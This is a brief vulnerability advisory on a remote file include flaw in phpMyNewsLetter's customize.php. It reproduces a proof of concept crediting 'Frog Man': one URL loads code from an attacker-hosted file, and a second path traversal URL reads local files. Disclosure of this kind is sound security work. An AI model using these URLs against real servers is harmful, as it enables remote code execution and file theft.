phpMyNewsLetter Remote File Include Vulnerability

phpMyNewsLetter Remote File Include Vulnerability

The following proof of concept has been supplied by Frog Man:

http://[target]/include/customize.php?l=http://[attacker]/code.txt&text=Hello%20World
With in http://[attacker]/code.txt :
<? echo $text; ?>

or
http://[target]/include/customize.php?l=../path/file/to/view